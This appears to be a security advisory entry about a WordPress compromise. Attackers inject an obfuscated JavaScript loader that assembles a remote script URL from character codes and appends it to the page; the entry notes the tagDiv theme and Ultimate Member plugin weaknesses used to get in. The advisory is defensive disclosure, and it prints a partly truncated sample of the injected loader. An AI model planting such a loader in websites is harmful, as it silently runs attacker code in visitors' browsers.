Injection of an obfuscated script from hxxps://cdn.allyouwant[.]online/main.js?...
Typical sample:
var po = document.createElement('script'); po.type = 'text/javascript'; po.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47,...skipped...63, 116, 61, 106, 108, 99); var scripts = document.getElementsByTagName('script');
var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == po.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(po);}
This script can be injected either into JavaScript files (usually with jquery in their names) or into WordPress database.
Affecting:
WordPress.
The attack mainly exploits vulnerabilities in old tagDiv themes and in unpatched Ultimate Member plugin (older than v2.0.22)
For more information and cleanup instructions read our blog post.